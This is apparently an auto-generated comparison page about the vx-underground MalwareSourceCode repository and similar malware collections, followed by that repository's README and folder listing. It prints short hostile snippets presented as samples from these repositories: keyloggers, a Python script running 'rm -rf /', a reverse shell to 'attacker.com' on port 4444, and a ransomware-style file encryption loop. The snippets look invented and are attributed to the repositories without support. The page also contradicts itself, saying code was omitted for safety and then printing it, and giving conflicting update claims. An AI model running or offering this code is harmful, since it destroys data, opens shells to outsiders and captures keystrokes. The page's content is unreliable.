MalwareSourceCode
Collection of malware source code for a variety of platforms in an array of different programming languages.
Top Related Projects
An open-source post-exploitation framework for students, researchers and developers.
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
One of a few malware collections on the GitHub.
A collection of malware samples caught by several honeypots i manage
Quick Overview
The vxunderground/MalwareSourceCode repository is a collection of malware source code, samples, and papers for educational purposes. It serves as a comprehensive archive of various malware types, including viruses, worms, and trojans, spanning different programming languages and platforms.
Pros
- Extensive collection of malware samples for research and analysis
- Educational resource for cybersecurity professionals and students
- Regularly updated with new samples and information
- Organized by language and malware type for easy navigation
Cons
- Potential misuse by malicious actors
- Legal and ethical concerns regarding the possession and distribution of malware
- Some samples may be outdated or no longer relevant to current threats
- Requires careful handling and secure environment for analysis
Note: As this is not a code library but rather a collection of malware samples, the code example and quick start sections have been omitted for safety and ethical reasons.
Competitor Comparisons
An open-source post-exploitation framework for students, researchers and developers.
Pros of BYOB
- Focused on building customizable botnets for educational purposes
- Provides a user-friendly command-line interface for botnet management
- Includes features like payload generation and client-side encryption
Cons of BYOB
- Less comprehensive in terms of malware variety compared to MalwareSourceCode
- May require more setup and configuration for specific use cases
- Limited to Python-based implementations
Code Comparison
BYOB (Python):
# Generate payload
@util.threaded
def generate(options, payload):
output = util.ByteIO()
__load__(payload, options, output, compress=True)
return output.getvalue()
MalwareSourceCode (C++):
// Keylogger function
void keylogger() {
char c;
while (true) {
for (c = 8; c <= 222; c++) {
if (GetAsyncKeyState(c) == -32767) {
// Log key press
}
}
}
}
BYOB focuses on botnet creation with a modular approach, while MalwareSourceCode provides a broader collection of malware samples in various languages. BYOB offers more user-friendly tools for educational purposes, but MalwareSourceCode provides a wider range of malware types for analysis and research.
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
Pros of theZoo
- Provides a more structured and organized collection of malware samples
- Includes a management script for easier handling and analysis of samples
- Offers a wider variety of malware types, including ransomware and trojans
Cons of theZoo
- Smaller collection size compared to MalwareSourceCode
- Less frequent updates and contributions from the community
- Focuses more on compiled binaries rather than source code
Code Comparison
MalwareSourceCode (Python malware example):
import os
import sys
import subprocess
def execute_command(command):
subprocess.call(command, shell=True)
execute_command("rm -rf /")
theZoo (Python malware example):
import socket
import subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker.com", 4444))
while True:
cmd = s.recv(1024).decode()
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(proc.stdout.read() + proc.stderr.read())
Both repositories contain malware source code, but MalwareSourceCode tends to have simpler, more straightforward examples, while theZoo often includes more complex and sophisticated malware samples.
One of a few malware collections on the GitHub.
Pros of MalwareDatabase
- Better organized with categorized folders for different malware types
- Includes additional resources like tools and scripts for malware analysis
- More frequently updated with recent contributions
Cons of MalwareDatabase
- Smaller collection of malware samples compared to MalwareSourceCode
- Less focus on source code, with more emphasis on compiled binaries
- Limited documentation and explanations for individual samples
Code Comparison
MalwareSourceCode (Ransomware example):
void encrypt_files(const std::string& directory) {
for (const auto& entry : std::filesystem::recursive_directory_iterator(directory)) {
if (entry.is_regular_file()) {
encrypt_file(entry.path().string());
}
}
}
MalwareDatabase (Keylogger example):
def log_keys():
with Listener(on_press=on_press) as listener:
listener.join()
def on_press(key):
with open("keylog.txt", "a") as f:
f.write(str(key) + "\n")
Both repositories provide valuable resources for malware researchers and cybersecurity professionals. MalwareSourceCode offers a more extensive collection of source code samples, while MalwareDatabase provides a well-organized set of malware binaries and analysis tools. The choice between them depends on the specific needs of the user, whether they're more interested in source code analysis or working with compiled samples.
A collection of malware samples caught by several honeypots i manage
Pros of malware-samples
- More focused collection of specific malware families
- Includes detailed analysis reports for some samples
- Organized by malware type/family for easier navigation
Cons of malware-samples
- Smaller repository with fewer total samples
- Less frequently updated compared to MalwareSourceCode
- Limited to compiled binaries, lacking source code
Code comparison
MalwareSourceCode often includes source code, while malware-samples primarily contains compiled binaries. Here's an example of a source code snippet from MalwareSourceCode:
void InfectFile(char *filename) {
FILE *fp = fopen(filename, "rb+");
if (fp == NULL) return;
// Infection logic here
fclose(fp);
}
malware-samples doesn't typically include source code, instead providing binary samples and analysis reports.
Summary
MalwareSourceCode offers a broader collection of malware source code and samples, updated more frequently. malware-samples provides a more curated selection of specific malware families with detailed analysis reports, but has a smaller overall collection. The choice between them depends on whether you need a wide variety of source code examples or in-depth analysis of specific malware types.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
managed by vx-underground | follow us on Twitter | download malware samples at the VXUG/samples page
Liability Disclaimer:
To the maximum extent permitted by applicable law, vx-underground and/or affiliates who have submitted content to vx-underground, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource
Notes
All source code which is packaged may or may not be set with the password 'infected' (without the '). Individual files are likely not packaged. Please do not comment asking for the password - it was placed all over vx-underground.org and the official vx-underground Twitter account.
File structure
- Android
- Generic Android OS malware, some leaks and proof-of-concepts
- Engines
- BAT
- Linux
- VBS
- Win32
- Java
- Some java infectors, proof-of-concept ransomware
- Javascript
- In-browser malware
- Legacy Windows
- Win2k
- Win32
- Win95
- Win98
- Win9x
- WinCE
- Libs (libraries)
- Bootkits
- DDoS proof-of-concepts
- Win32 libraries (disassemblers, etc).
- Linux
- Backdoors
- Botnets
- Infectors
- Mirai-Family (related and/or spin-offs)
- Rootkits
- Tools
- Trojans
- MSDOS
MSIL- MacOS
- Other
- Acad malware
- FreeBSD malware
- SunOS malware
- Symbian OS malware
- Discord-specific malware
- PHP
- Albania family
- C99 family
- Crewcorp family
- Defacement Tools
- PHP Infectors
- Lanker family
- Macker family
- PhpSpy family
- R57-shell family
- Panel (web panel collections)
- Perl
- Various backdoors, hack tools, and infectors
- Phishing
- Collection of various phishing pages
- Point of Sales malware
- Python
- Hacktools, various exotic-malware (such as chastity belt ransomware)
- Ruby
- Win32
- Binders
- Botnets
- Crypters
- Exploit kits
- Infectors
- Internet worms
- Malware families
- Ransomware
- Rootkits
- Stealers
Contributors
Marius 'f0wL' Genheimer
Jan 'Duchy' Neduchal
Eduardo P. Gomez
DartPower
Luca364
TheAnonHackUk
Bruce Ediger
Avv
Alan Wake
Top Related Projects
An open-source post-exploitation framework for students, researchers and developers.
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
One of a few malware collections on the GitHub.
A collection of malware samples caught by several honeypots i manage
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot